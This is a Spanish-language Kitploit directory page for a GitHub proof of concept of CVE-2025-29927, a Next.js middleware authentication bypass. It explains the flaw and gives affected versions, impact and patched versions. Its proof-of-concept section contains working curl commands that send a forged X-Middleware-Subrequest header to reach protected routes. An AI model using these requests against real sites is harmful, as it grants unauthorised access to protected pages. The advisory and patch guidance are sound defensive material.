Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29927 — Exploit de prueba de concepto para CVE-2025-29927, que demuestra omisión de autenticación en middleware de Next.js mediante el encabezado x-middleware-subrequest, con versiones afectadas y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/toddkk02/cve-2025-29927
Autenticación y AutorizaciónAnálisis de VulnerabilidadesEvasión de IDS/IPSExplotación de Aplicaciones WebCTFPruebas de Penetración
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

Exploit de prueba de concepto para CVE-2025-29927, que demuestra omisión de autenticación en middleware de Next.js mediante el encabezado x-middleware-subrequest, con versiones afectadas y guía de mitigación.

Ver Repositorio
2hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-29927 — Omisión de Autenticación en Middleware de Next.js

Resumen

Imagina un portero frente a la discoteca, pero si le dices "Ya estoy dentro", te deja pasar sin revisar. Eso es exactamente CVE-2025-29927.

El middleware en Next.js se ejecuta antes de procesar una solicitud, lo que lo convierte en el lugar ideal para manejar la autenticación. Next.js utiliza un encabezado interno x-middleware-subrequest para evitar solicitudes recursivas y bucles infinitos. Esta vulnerabilidad demuestra que es posible omitir o saltar la ejecución del middleware por completo, incluyendo comprobaciones de seguridad críticas como la autenticación antes de llegar a una ruta protegida.


Versiones afectadas

RamaCorregida en
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

Aplicaciones vulnerables

  • Aplicaciones que alojan Next.js y utilizan middleware
  • Aplicaciones que dependen del middleware para autenticación y comprobaciones de seguridad sin validar posteriormente en la pila de la aplicación

No afectadas

  • Aplicaciones alojadas en Vercel
  • Aplicaciones alojadas en Netlify
  • Aplicaciones publicadas como exportaciones estáticas (el middleware no se ejecuta)

Impacto

Miles o millones de aplicaciones se ejecutan en versiones de Next.js sin parchear. Si no se mitiga, esta vulnerabilidad permite el acceso no autenticado a rutas protegidas por cualquier persona, sin necesidad de credenciales.


Prueba de concepto

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

La respuesta devuelve la página protegida sin ninguna autenticación.

Exploté esta vulnerabilidad en un entorno CTF real

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

Corrección

Actualiza Next.js a una versión parcheada:

  • 15.x → 15.2.3 o superior
  • 14.x → 14.2.25 o superior
  • 13.x → 13.5.9 o superior
Descargar herramienta